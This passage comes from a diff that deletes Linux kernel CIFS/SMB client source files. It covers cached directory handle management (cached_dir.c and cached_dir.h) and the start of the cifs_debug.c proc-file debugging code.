+-	if (le32_to_cpu(qi_rsp->OutputBufferLength) < sizeof(struct smb2_file_all_info))
+-		goto oshr_free;
+-	if (!smb2_validate_and_copy_iov(
+-				le16_to_cpu(qi_rsp->OutputBufferOffset),
+-				sizeof(struct smb2_file_all_info),
+-				&rsp_iov[1], sizeof(struct smb2_file_all_info),
+-				(char *)&cfid->file_all_info))
+-		cfid->file_all_info_is_valid = true;
+-
+-	if (!npath[0])
+-		dentry = dget(cifs_sb->root);
+-	else {
+-		dentry = path_to_dentry(cifs_sb, npath);
+-		if (IS_ERR(dentry)) {
+-			rc = -ENOENT;
+-			goto oshr_free;
+-		}
+-	}
+-	cfid->dentry = dentry;
+-	cfid->time = jiffies;
+-	cfid->has_lease = true;
+-
+-oshr_free:
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_query_info_free(&rqst[1]);
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	spin_lock(&cfids->cfid_list_lock);
+-	if (rc && !cfid->has_lease) {
+-		if (cfid->on_list) {
+-			list_del(&cfid->entry);
+-			cfid->on_list = false;
+-			cfids->num_entries--;
+-		}
+-		rc = -ENOENT;
+-	}
+-	spin_unlock(&cfids->cfid_list_lock);
+-	if (!rc && !cfid->has_lease) {
+-		/*
+-		 * We are guaranteed to have two references at this point.
+-		 * One for the caller and one for a potential lease.
+-		 * Release the Lease-ref so that the directory will be closed
+-		 * when the caller closes the cached handle.
+-		 */
+-		kref_put(&cfid->refcount, smb2_close_cached_fid);
+-	}
+-	if (rc) {
+-		if (cfid->is_open)
+-			SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+-				   cfid->fid.volatile_fid);
+-		free_cached_dir(cfid);
+-		cfid = NULL;
+-	}
+-
+-	if (rc == 0) {
+-		*ret_cfid = cfid;
+-		atomic_inc(&tcon->num_remote_opens);
+-	}
+-
+-	return rc;
+-}
+-
+-int open_cached_dir_by_dentry(struct cifs_tcon *tcon,
+-			      struct dentry *dentry,
+-			      struct cached_fid **ret_cfid)
+-{
+-	struct cached_fid *cfid;
+-	struct cached_fids *cfids = tcon->cfids;
+-
+-	if (cfids == NULL)
+-		return -ENOENT;
+-
+-	spin_lock(&cfids->cfid_list_lock);
+-	list_for_each_entry(cfid, &cfids->entries, entry) {
+-		if (dentry && cfid->dentry == dentry) {
+-			cifs_dbg(FYI, "found a cached root file handle by dentry\n");
+-			kref_get(&cfid->refcount);
+-			*ret_cfid = cfid;
+-			spin_unlock(&cfids->cfid_list_lock);
+-			return 0;
+-		}
+-	}
+-	spin_unlock(&cfids->cfid_list_lock);
+-	return -ENOENT;
+-}
+-
+-static void
+-smb2_close_cached_fid(struct kref *ref)
+-{
+-	struct cached_fid *cfid = container_of(ref, struct cached_fid,
+-					       refcount);
+-
+-	spin_lock(&cfid->cfids->cfid_list_lock);
+-	if (cfid->on_list) {
+-		list_del(&cfid->entry);
+-		cfid->on_list = false;
+-		cfid->cfids->num_entries--;
+-	}
+-	spin_unlock(&cfid->cfids->cfid_list_lock);
+-
+-	dput(cfid->dentry);
+-	cfid->dentry = NULL;
+-
+-	if (cfid->is_open) {
+-		SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+-			   cfid->fid.volatile_fid);
+-		atomic_dec(&cfid->tcon->num_remote_opens);
+-	}
+-
+-	free_cached_dir(cfid);
+-}
+-
+-void drop_cached_dir_by_name(const unsigned int xid, struct cifs_tcon *tcon,
+-			     const char *name, struct cifs_sb_info *cifs_sb)
+-{
+-	struct cached_fid *cfid = NULL;
+-	int rc;
+-
+-	rc = open_cached_dir(xid, tcon, name, cifs_sb, true, &cfid);
+-	if (rc) {
+-		cifs_dbg(FYI, "no cached dir found for rmdir(%s)\n", name);
+-		return;
+-	}
+-	spin_lock(&cfid->cfids->cfid_list_lock);
+-	if (cfid->has_lease) {
+-		cfid->has_lease = false;
+-		kref_put(&cfid->refcount, smb2_close_cached_fid);
+-	}
+-	spin_unlock(&cfid->cfids->cfid_list_lock);
+-	close_cached_dir(cfid);
+-}
+-
+-
+-void close_cached_dir(struct cached_fid *cfid)
+-{
+-	kref_put(&cfid->refcount, smb2_close_cached_fid);
+-}
+-
+-/*
+- * Called from cifs_kill_sb when we unmount a share
+- */
+-void close_all_cached_dirs(struct cifs_sb_info *cifs_sb)
+-{
+-	struct rb_root *root = &cifs_sb->tlink_tree;
+-	struct rb_node *node;
+-	struct cached_fid *cfid;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink;
+-	struct cached_fids *cfids;
+-
+-	for (node = rb_first(root); node; node = rb_next(node)) {
+-		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
+-		tcon = tlink_tcon(tlink);
+-		if (IS_ERR(tcon))
+-			continue;
+-		cfids = tcon->cfids;
+-		if (cfids == NULL)
+-			continue;
+-		list_for_each_entry(cfid, &cfids->entries, entry) {
+-			dput(cfid->dentry);
+-			cfid->dentry = NULL;
+-		}
+-	}
+-}
+-
+-/*
+- * Invalidate all cached dirs when a TCON has been reset
+- * due to a session loss.
+- */
+-void invalidate_all_cached_dirs(struct cifs_tcon *tcon)
+-{
+-	struct cached_fids *cfids = tcon->cfids;
+-	struct cached_fid *cfid, *q;
+-	LIST_HEAD(entry);
+-
+-	spin_lock(&cfids->cfid_list_lock);
+-	list_for_each_entry_safe(cfid, q, &cfids->entries, entry) {
+-		list_move(&cfid->entry, &entry);
+-		cfids->num_entries--;
+-		cfid->is_open = false;
+-		cfid->on_list = false;
+-		/* To prevent race with smb2_cached_lease_break() */
+-		kref_get(&cfid->refcount);
+-	}
+-	spin_unlock(&cfids->cfid_list_lock);
+-
+-	list_for_each_entry_safe(cfid, q, &entry, entry) {
+-		list_del(&cfid->entry);
+-		cancel_work_sync(&cfid->lease_break);
+-		if (cfid->has_lease) {
+-			/*
+-			 * We lease was never cancelled from the server so we
+-			 * need to drop the reference.
+-			 */
+-			spin_lock(&cfids->cfid_list_lock);
+-			cfid->has_lease = false;
+-			spin_unlock(&cfids->cfid_list_lock);
+-			kref_put(&cfid->refcount, smb2_close_cached_fid);
+-		}
+-		/* Drop the extra reference opened above*/
+-		kref_put(&cfid->refcount, smb2_close_cached_fid);
+-	}
+-}
+-
+-static void
+-smb2_cached_lease_break(struct work_struct *work)
+-{
+-	struct cached_fid *cfid = container_of(work,
+-				struct cached_fid, lease_break);
+-
+-	spin_lock(&cfid->cfids->cfid_list_lock);
+-	cfid->has_lease = false;
+-	spin_unlock(&cfid->cfids->cfid_list_lock);
+-	kref_put(&cfid->refcount, smb2_close_cached_fid);
+-}
+-
+-int cached_dir_lease_break(struct cifs_tcon *tcon, __u8 lease_key[16])
+-{
+-	struct cached_fids *cfids = tcon->cfids;
+-	struct cached_fid *cfid;
+-
+-	if (cfids == NULL)
+-		return false;
+-
+-	spin_lock(&cfids->cfid_list_lock);
+-	list_for_each_entry(cfid, &cfids->entries, entry) {
+-		if (cfid->has_lease &&
+-		    !memcmp(lease_key,
+-			    cfid->fid.lease_key,
+-			    SMB2_LEASE_KEY_SIZE)) {
+-			cfid->time = 0;
+-			/*
+-			 * We found a lease remove it from the list
+-			 * so no threads can access it.
+-			 */
+-			list_del(&cfid->entry);
+-			cfid->on_list = false;
+-			cfids->num_entries--;
+-
+-			queue_work(cifsiod_wq,
+-				   &cfid->lease_break);
+-			spin_unlock(&cfids->cfid_list_lock);
+-			return true;
+-		}
+-	}
+-	spin_unlock(&cfids->cfid_list_lock);
+-	return false;
+-}
+-
+-static struct cached_fid *init_cached_dir(const char *path)
+-{
+-	struct cached_fid *cfid;
+-
+-	cfid = kzalloc(sizeof(*cfid), GFP_ATOMIC);
+-	if (!cfid)
+-		return NULL;
+-	cfid->path = kstrdup(path, GFP_ATOMIC);
+-	if (!cfid->path) {
+-		kfree(cfid);
+-		return NULL;
+-	}
+-
+-	INIT_WORK(&cfid->lease_break, smb2_cached_lease_break);
+-	INIT_LIST_HEAD(&cfid->entry);
+-	INIT_LIST_HEAD(&cfid->dirents.entries);
+-	mutex_init(&cfid->dirents.de_mutex);
+-	spin_lock_init(&cfid->fid_lock);
+-	kref_init(&cfid->refcount);
+-	return cfid;
+-}
+-
+-static void free_cached_dir(struct cached_fid *cfid)
+-{
+-	struct cached_dirent *dirent, *q;
+-
+-	dput(cfid->dentry);
+-	cfid->dentry = NULL;
+-
+-	/*
+-	 * Delete all cached dirent names
+-	 */
+-	list_for_each_entry_safe(dirent, q, &cfid->dirents.entries, entry) {
+-		list_del(&dirent->entry);
+-		kfree(dirent->name);
+-		kfree(dirent);
+-	}
+-
+-	kfree(cfid->path);
+-	cfid->path = NULL;
+-	kfree(cfid);
+-}
+-
+-struct cached_fids *init_cached_dirs(void)
+-{
+-	struct cached_fids *cfids;
+-
+-	cfids = kzalloc(sizeof(*cfids), GFP_KERNEL);
+-	if (!cfids)
+-		return NULL;
+-	spin_lock_init(&cfids->cfid_list_lock);
+-	INIT_LIST_HEAD(&cfids->entries);
+-	return cfids;
+-}
+-
+-/*
+- * Called from tconInfoFree when we are tearing down the tcon.
+- * There are no active users or open files/directories at this point.
+- */
+-void free_cached_dirs(struct cached_fids *cfids)
+-{
+-	struct cached_fid *cfid, *q;
+-	LIST_HEAD(entry);
+-
+-	spin_lock(&cfids->cfid_list_lock);
+-	list_for_each_entry_safe(cfid, q, &cfids->entries, entry) {
+-		cfid->on_list = false;
+-		cfid->is_open = false;
+-		list_move(&cfid->entry, &entry);
+-	}
+-	spin_unlock(&cfids->cfid_list_lock);
+-
+-	list_for_each_entry_safe(cfid, q, &entry, entry) {
+-		list_del(&cfid->entry);
+-		free_cached_dir(cfid);
+-	}
+-
+-	kfree(cfids);
+-}
+diff --git a/fs/cifs/cached_dir.h b/fs/cifs/cached_dir.h
+deleted file mode 100644
+index 2f4e764c9ca9a..0000000000000
+--- a/fs/cifs/cached_dir.h
++++ /dev/null
+@@ -1,80 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- *  Functions to handle the cached directory entries
+- *
+- *  Copyright (c) 2022, Ronnie Sahlberg <lsahlber@redhat.com>
+- */
+-
+-#ifndef _CACHED_DIR_H
+-#define _CACHED_DIR_H
+-
+-
+-struct cached_dirent {
+-	struct list_head entry;
+-	char *name;
+-	int namelen;
+-	loff_t pos;
+-
+-	struct cifs_fattr fattr;
+-};
+-
+-struct cached_dirents {
+-	bool is_valid:1;
+-	bool is_failed:1;
+-	struct dir_context *ctx; /*
+-				  * Only used to make sure we only take entries
+-				  * from a single context. Never dereferenced.
+-				  */
+-	struct mutex de_mutex;
+-	int pos;		 /* Expected ctx->pos */
+-	struct list_head entries;
+-};
+-
+-struct cached_fid {
+-	struct list_head entry;
+-	struct cached_fids *cfids;
+-	const char *path;
+-	bool has_lease:1;
+-	bool is_open:1;
+-	bool on_list:1;
+-	bool file_all_info_is_valid:1;
+-	unsigned long time; /* jiffies of when lease was taken */
+-	struct kref refcount;
+-	struct cifs_fid fid;
+-	spinlock_t fid_lock;
+-	struct cifs_tcon *tcon;
+-	struct dentry *dentry;
+-	struct work_struct lease_break;
+-	struct smb2_file_all_info file_all_info;
+-	struct cached_dirents dirents;
+-};
+-
+-#define MAX_CACHED_FIDS 16
+-struct cached_fids {
+-	/* Must be held when:
+-	 * - accessing the cfids->entries list
+-	 */
+-	spinlock_t cfid_list_lock;
+-	int num_entries;
+-	struct list_head entries;
+-};
+-
+-extern struct cached_fids *init_cached_dirs(void);
+-extern void free_cached_dirs(struct cached_fids *cfids);
+-extern int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+-			   const char *path,
+-			   struct cifs_sb_info *cifs_sb,
+-			   bool lookup_only, struct cached_fid **cfid);
+-extern int open_cached_dir_by_dentry(struct cifs_tcon *tcon,
+-				     struct dentry *dentry,
+-				     struct cached_fid **cfid);
+-extern void close_cached_dir(struct cached_fid *cfid);
+-extern void drop_cached_dir_by_name(const unsigned int xid,
+-				    struct cifs_tcon *tcon,
+-				    const char *name,
+-				    struct cifs_sb_info *cifs_sb);
+-extern void close_all_cached_dirs(struct cifs_sb_info *cifs_sb);
+-extern void invalidate_all_cached_dirs(struct cifs_tcon *tcon);
+-extern int cached_dir_lease_break(struct cifs_tcon *tcon, __u8 lease_key[16]);
+-
+-#endif			/* _CACHED_DIR_H */
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+deleted file mode 100644
+index e41154ad96afc..0000000000000
+--- a/fs/cifs/cifs_debug.c
++++ /dev/null
+@@ -1,1067 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2000,2005
+- *
+- *   Modified by Steve French (sfrench@us.ibm.com)
+- */
+-#include <linux/fs.h>
+-#include <linux/string.h>
+-#include <linux/ctype.h>
+-#include <linux/module.h>
+-#include <linux/proc_fs.h>
+-#include <linux/uaccess.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifsfs.h"
+-#include "fs_context.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-#include "smbdirect.h"
+-#endif
+-#include "cifs_swn.h"
+-
+-void
+-cifs_dump_mem(char *label, void *data, int length)
+-{
+-	pr_debug("%s: dump of %d bytes of data at 0x%p\n", label, length, data);
+-	print_hex_dump(KERN_DEBUG, "", DUMP_PREFIX_OFFSET, 16, 4,
+-		       data, length, true);
+-}
+-
+-void cifs_dump_detail(void *buf, struct TCP_Server_Info *server)
+-{
+-#ifdef CONFIG_CIFS_DEBUG2
+-	struct smb_hdr *smb = buf;
+-
+-	cifs_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Flgs2: 0x%x Mid: %d Pid: %d\n",
+-		 smb->Command, smb->Status.CifsError,
+-		 smb->Flags, smb->Flags2, smb->Mid, smb->Pid);
+-	cifs_dbg(VFS, "smb buf %p len %u\n", smb,
+-		 server->ops->calc_smb_size(smb));
+-#endif /* CONFIG_CIFS_DEBUG2 */
+-}
+-
+-void cifs_dump_mids(struct TCP_Server_Info *server)
+-{
+-#ifdef CONFIG_CIFS_DEBUG2
+-	struct mid_q_entry *mid_entry;
+-
+-	if (server == NULL)
+-		return;
+-
+-	cifs_dbg(VFS, "Dump pending requests:\n");
+-	spin_lock(&server->mid_lock);
+-	list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
+-		cifs_dbg(VFS, "State: %d Cmd: %d Pid: %d Cbdata: %p Mid %llu\n",
+-			 mid_entry->mid_state,
+-			 le16_to_cpu(mid_entry->command),
+-			 mid_entry->pid,
+-			 mid_entry->callback_data,
+-			 mid_entry->mid);
+-#ifdef CONFIG_CIFS_STATS2
+-		cifs_dbg(VFS, "IsLarge: %d buf: %p time rcv: %ld now: %ld\n",
+-			 mid_entry->large_buf,
+-			 mid_entry->resp_buf,
+-			 mid_entry->when_received,
+-			 jiffies);
+-#endif /* STATS2 */
+-		cifs_dbg(VFS, "IsMult: %d IsEnd: %d\n",
+-			 mid_entry->multiRsp, mid_entry->multiEnd);
+-		if (mid_entry->resp_buf) {
+-			cifs_dump_detail(mid_entry->resp_buf, server);
+-			cifs_dump_mem("existing buf: ",
+-				mid_entry->resp_buf, 62);
+-		}
+-	}
+-	spin_unlock(&server->mid_lock);
+-#endif /* CONFIG_CIFS_DEBUG2 */
+-}
+-
+-#ifdef CONFIG_PROC_FS
+-static void cifs_debug_tcon(struct seq_file *m, struct cifs_tcon *tcon)
+-{
+-	__u32 dev_type = le32_to_cpu(tcon->fsDevInfo.DeviceType);
+-
+-	seq_printf(m, "%s Mounts: %d ", tcon->tree_name, tcon->tc_count);
+-	if (tcon->nativeFileSystem)
+-		seq_printf(m, "Type: %s ", tcon->nativeFileSystem);
+-	seq_printf(m, "DevInfo: 0x%x Attributes: 0x%x\n\tPathComponentMax: %d Status: %d",
+-		   le32_to_cpu(tcon->fsDevInfo.DeviceCharacteristics),
+-		   le32_to_cpu(tcon->fsAttrInfo.Attributes),
+-		   le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength),
+-		   tcon->status);
+-	if (dev_type == FILE_DEVICE_DISK)
+-		seq_puts(m, " type: DISK ");
+-	else if (dev_type == FILE_DEVICE_CD_ROM)
+-		seq_puts(m, " type: CDROM ");
+-	else
+-		seq_printf(m, " type: %d ", dev_type);
+-
+-	seq_printf(m, "Serial Number: 0x%x", tcon->vol_serial_number);
+-
+-	if ((tcon->seal) ||
+-	    (tcon->ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA) ||
+-	    (tcon->share_flags & SHI1005_FLAGS_ENCRYPT_DATA))
+-		seq_printf(m, " Encrypted");
+-	if (tcon->nocase)
+-		seq_printf(m, " nocase");
+-	if (tcon->unix_ext)
+-		seq_printf(m, " POSIX Extensions");
+-	if (tcon->ses->server->ops->dump_share_caps)
+-		tcon->ses->server->ops->dump_share_caps(m, tcon);
+-	if (tcon->use_witness)
+-		seq_puts(m, " Witness");
+-	if (tcon->broken_sparse_sup)
+-		seq_puts(m, " nosparse");
+-	if (tcon->need_reconnect)
+-		seq_puts(m, "\tDISCONNECTED ");
+-	seq_putc(m, '\n');
+-}
+-
+-static void
+-cifs_dump_channel(struct seq_file *m, int i, struct cifs_chan *chan)
+-{
+-	struct TCP_Server_Info *server = chan->server;
+-
+-	seq_printf(m, "\n\n\t\tChannel: %d ConnectionId: 0x%llx"
+-		   "\n\t\tNumber of credits: %d Dialect 0x%x"
+-		   "\n\t\tTCP status: %d Instance: %d"
+-		   "\n\t\tLocal Users To Server: %d SecMode: 0x%x Req On Wire: %d"
+-		   "\n\t\tIn Send: %d In MaxReq Wait: %d",
+-		   i+1, server->conn_id,
+-		   server->credits,
+-		   server->dialect,
+-		   server->tcpStatus,
+-		   server->reconnect_instance,
+-		   server->srv_count,
+-		   server->sec_mode,
+-		   in_flight(server),
+-		   atomic_read(&server->in_send),
+-		   atomic_read(&server->num_waiters));
+-}
+-
+-static void
+-cifs_dump_iface(struct seq_file *m, struct cifs_server_iface *iface)
+-{
+-	struct sockaddr_in *ipv4 = (struct sockaddr_in *)&iface->sockaddr;
+-	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&iface->sockaddr;
+-
+-	seq_printf(m, "\tSpeed: %zu bps\n", iface->speed);
+-	seq_puts(m, "\t\tCapabilities: ");
+-	if (iface->rdma_capable)
+-		seq_puts(m, "rdma ");
+-	if (iface->rss_capable)
+-		seq_puts(m, "rss ");
+-	seq_putc(m, '\n');
+-	if (iface->sockaddr.ss_family == AF_INET)
+-		seq_printf(m, "\t\tIPv4: %pI4\n", &ipv4->sin_addr);
+-	else if (iface->sockaddr.ss_family == AF_INET6)
+-		seq_printf(m, "\t\tIPv6: %pI6\n", &ipv6->sin6_addr);
+-	if (!iface->is_active)
+-		seq_puts(m, "\t\t[for-cleanup]\n");
+-}
+-
+-static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+-{
+-	struct TCP_Server_Info *server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct cifsFileInfo *cfile;
+-
+-	seq_puts(m, "# Version:1\n");
+-	seq_puts(m, "# Format:\n");
+-	seq_puts(m, "# <tree id> <ses id> <persistent fid> <flags> <count> <pid> <uid>");
+-#ifdef CONFIG_CIFS_DEBUG2
+-	seq_printf(m, " <filename> <mid>\n");
+-#else
+-	seq_printf(m, " <filename>\n");
+-#endif /* CIFS_DEBUG2 */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-				spin_lock(&tcon->open_file_lock);
+-				list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-					seq_printf(m,
+-						"0x%x 0x%llx 0x%llx 0x%x %d %d %d %pd",
+-						tcon->tid,
+-						ses->Suid,
+-						cfile->fid.persistent_fid,
+-						cfile->f_flags,
+-						cfile->count,
+-						cfile->pid,
+-						from_kuid(&init_user_ns, cfile->uid),
+-						cfile->dentry);
+-#ifdef CONFIG_CIFS_DEBUG2
+-					seq_printf(m, " %llu\n", cfile->fid.mid);
+-#else
+-					seq_printf(m, "\n");
+-#endif /* CIFS_DEBUG2 */
+-				}
+-				spin_unlock(&tcon->open_file_lock);
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	seq_putc(m, '\n');
+-	return 0;
+-}
+-
+-static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+-{
+-	struct mid_q_entry *mid_entry;
+-	struct TCP_Server_Info *server;
+-	struct TCP_Server_Info *chan_server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct cifs_server_iface *iface;
+-	int c, i, j;
+-
+-	seq_puts(m,
+-		    "Display Internal CIFS Data Structures for Debugging\n"
+-		    "---------------------------------------------------\n");
+-	seq_printf(m, "CIFS Version %s\n", CIFS_VERSION);
+-	seq_printf(m, "Features:");
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	seq_printf(m, " DFS");
+-#endif
+-#ifdef CONFIG_CIFS_FSCACHE
+-	seq_printf(m, ",FSCACHE");
+-#endif
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	seq_printf(m, ",SMB_DIRECT");
+-#endif
+-#ifdef CONFIG_CIFS_STATS2
+-	seq_printf(m, ",STATS2");
+-#else
+-	seq_printf(m, ",STATS");
+-#endif
+-#ifdef CONFIG_CIFS_DEBUG2
+-	seq_printf(m, ",DEBUG2");
+-#elif defined(CONFIG_CIFS_DEBUG)
+-	seq_printf(m, ",DEBUG");
+-#endif
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	seq_printf(m, ",ALLOW_INSECURE_LEGACY");
+-#endif
+-#ifdef CONFIG_CIFS_POSIX
+-	seq_printf(m, ",CIFS_POSIX");
+-#endif
+-#ifdef CONFIG_CIFS_UPCALL
+-	seq_printf(m, ",UPCALL(SPNEGO)");
+-#endif
+-#ifdef CONFIG_CIFS_XATTR
+-	seq_printf(m, ",XATTR");
+-#endif
+-	seq_printf(m, ",ACL");
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-	seq_puts(m, ",WITNESS");
+-#endif
+-	seq_putc(m, '\n');
+-	seq_printf(m, "CIFSMaxBufSize: %d\n", CIFSMaxBufSize);
+-	seq_printf(m, "Active VFS Requests: %d\n", GlobalTotalActiveXid);
+-
+-	seq_printf(m, "\nServers: ");
+-
+-	c = 0;
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		/* channel info will be printed as a part of sessions below */
+-		if (CIFS_SERVER_IS_CHAN(server))
+-			continue;
+-
+-		c++;
+-		seq_printf(m, "\n%d) ConnectionId: 0x%llx ",
+-			c, server->conn_id);
+-
+-		spin_lock(&server->srv_lock);
+-		if (server->hostname)
+-			seq_printf(m, "Hostname: %s ", server->hostname);
+-		spin_unlock(&server->srv_lock);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-		if (!server->rdma)
+-			goto skip_rdma;
+-
+-		if (!server->smbd_conn) {
+-			seq_printf(m, "\nSMBDirect transport not available");
+-			goto skip_rdma;
+-		}
+-
+-		seq_printf(m, "\nSMBDirect (in hex) protocol version: %x "
+-			"transport status: %x",
+-			server->smbd_conn->protocol,
+-			server->smbd_conn->transport_status);
+-		seq_printf(m, "\nConn receive_credit_max: %x "
+-			"send_credit_target: %x max_send_size: %x",
+-			server->smbd_conn->receive_credit_max,
+-			server->smbd_conn->send_credit_target,
+-			server->smbd_conn->max_send_size);
+-		seq_printf(m, "\nConn max_fragmented_recv_size: %x "
+-			"max_fragmented_send_size: %x max_receive_size:%x",
+-			server->smbd_conn->max_fragmented_recv_size,
+-			server->smbd_conn->max_fragmented_send_size,
+-			server->smbd_conn->max_receive_size);
+-		seq_printf(m, "\nConn keep_alive_interval: %x "
+-			"max_readwrite_size: %x rdma_readwrite_threshold: %x",
+-			server->smbd_conn->keep_alive_interval,
+-			server->smbd_conn->max_readwrite_size,
+-			server->smbd_conn->rdma_readwrite_threshold);
+-		seq_printf(m, "\nDebug count_get_receive_buffer: %x "
+-			"count_put_receive_buffer: %x count_send_empty: %x",
+-			server->smbd_conn->count_get_receive_buffer,
+-			server->smbd_conn->count_put_receive_buffer,
+-			server->smbd_conn->count_send_empty);
+-		seq_printf(m, "\nRead Queue count_reassembly_queue: %x "
+-			"count_enqueue_reassembly_queue: %x "
+-			"count_dequeue_reassembly_queue: %x "
+-			"fragment_reassembly_remaining: %x "
+-			"reassembly_data_length: %x "
+-			"reassembly_queue_length: %x",
+-			server->smbd_conn->count_reassembly_queue,
+-			server->smbd_conn->count_enqueue_reassembly_queue,
+-			server->smbd_conn->count_dequeue_reassembly_queue,
+-			server->smbd_conn->fragment_reassembly_remaining,
+-			server->smbd_conn->reassembly_data_length,
+-			server->smbd_conn->reassembly_queue_length);
+-		seq_printf(m, "\nCurrent Credits send_credits: %x "
+-			"receive_credits: %x receive_credit_target: %x",
+-			atomic_read(&server->smbd_conn->send_credits),
+-			atomic_read(&server->smbd_conn->receive_credits),
+-			server->smbd_conn->receive_credit_target);
+-		seq_printf(m, "\nPending send_pending: %x ",
+-			atomic_read(&server->smbd_conn->send_pending));
+-		seq_printf(m, "\nReceive buffers count_receive_queue: %x "
+-			"count_empty_packet_queue: %x",
+-			server->smbd_conn->count_receive_queue,
+-			server->smbd_conn->count_empty_packet_queue);
+-		seq_printf(m, "\nMR responder_resources: %x "
+-			"max_frmr_depth: %x mr_type: %x",
+-			server->smbd_conn->responder_resources,
+-			server->smbd_conn->max_frmr_depth,
+-			server->smbd_conn->mr_type);
+-		seq_printf(m, "\nMR mr_ready_count: %x mr_used_count: %x",
+-			atomic_read(&server->smbd_conn->mr_ready_count),
+-			atomic_read(&server->smbd_conn->mr_used_count));
+-skip_rdma:
+-#endif
+-		seq_printf(m, "\nNumber of credits: %d Dialect 0x%x",
+-			server->credits,  server->dialect);
+-		if (server->compress_algorithm == SMB3_COMPRESS_LZNT1)
+-			seq_printf(m, " COMPRESS_LZNT1");
+-		else if (server->compress_algorithm == SMB3_COMPRESS_LZ77)
+-			seq_printf(m, " COMPRESS_LZ77");
+-		else if (server->compress_algorithm == SMB3_COMPRESS_LZ77_HUFF)
+-			seq_printf(m, " COMPRESS_LZ77_HUFF");
+-		if (server->sign)
+-			seq_printf(m, " signed");
+-		if (server->posix_ext_supported)
+-			seq_printf(m, " posix");
+-		if (server->nosharesock)
+-			seq_printf(m, " nosharesock");
+-
+-		if (server->rdma)
+-			seq_printf(m, "\nRDMA ");
+-		seq_printf(m, "\nTCP status: %d Instance: %d"
+-				"\nLocal Users To Server: %d SecMode: 0x%x Req On Wire: %d",
+-				server->tcpStatus,
+-				server->reconnect_instance,
+-				server->srv_count,
+-				server->sec_mode, in_flight(server));
+-
+-		seq_printf(m, "\nIn Send: %d In MaxReq Wait: %d",
+-				atomic_read(&server->in_send),
+-				atomic_read(&server->num_waiters));
+-
+-		seq_printf(m, "\n\n\tSessions: ");
+-		i = 0;
+-		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-			i++;
+-			if ((ses->serverDomain == NULL) ||
+-				(ses->serverOS == NULL) ||
+-				(ses->serverNOS == NULL)) {
+-				seq_printf(m, "\n\t%d) Address: %s Uses: %d Capability: 0x%x\tSession Status: %d ",
+-					i, ses->ip_addr, ses->ses_count,
+-					ses->capabilities, ses->ses_status);
+-				if (ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST)
+-					seq_printf(m, "Guest ");
+-				else if (ses->session_flags & SMB2_SESSION_FLAG_IS_NULL)
+-					seq_printf(m, "Anonymous ");
+-			} else {
+-				seq_printf(m,
+-				    "\n\t%d) Name: %s  Domain: %s Uses: %d OS: %s "
+-				    "\n\tNOS: %s\tCapability: 0x%x"
+-					"\n\tSMB session status: %d ",
+-				i, ses->ip_addr, ses->serverDomain,
+-				ses->ses_count, ses->serverOS, ses->serverNOS,
+-				ses->capabilities, ses->ses_status);
+-			}
+-
+-			seq_printf(m, "\n\tSecurity type: %s ",
+-				get_security_type_str(server->ops->select_sectype(server, ses->sectype)));
+-
+-			/* dump session id helpful for use with network trace */
+-			seq_printf(m, " SessionId: 0x%llx", ses->Suid);
+-			if (ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA)
+-				seq_puts(m, " encrypted");
+-			if (ses->sign)
+-				seq_puts(m, " signed");
+-
+-			seq_printf(m, "\n\tUser: %d Cred User: %d",
+-				   from_kuid(&init_user_ns, ses->linux_uid),
+-				   from_kuid(&init_user_ns, ses->cred_uid));
+-
+-			spin_lock(&ses->chan_lock);
+-			if (CIFS_CHAN_NEEDS_RECONNECT(ses, 0))
+-				seq_puts(m, "\tPrimary channel: DISCONNECTED ");
+-			if (CIFS_CHAN_IN_RECONNECT(ses, 0))
+-				seq_puts(m, "\t[RECONNECTING] ");
+-
+-			if (ses->chan_count > 1) {
+-				seq_printf(m, "\n\n\tExtra Channels: %zu ",
+-					   ses->chan_count-1);
+-				for (j = 1; j < ses->chan_count; j++) {
+-					cifs_dump_channel(m, j, &ses->chans[j]);
+-					if (CIFS_CHAN_NEEDS_RECONNECT(ses, j))
+-						seq_puts(m, "\tDISCONNECTED ");
+-					if (CIFS_CHAN_IN_RECONNECT(ses, j))
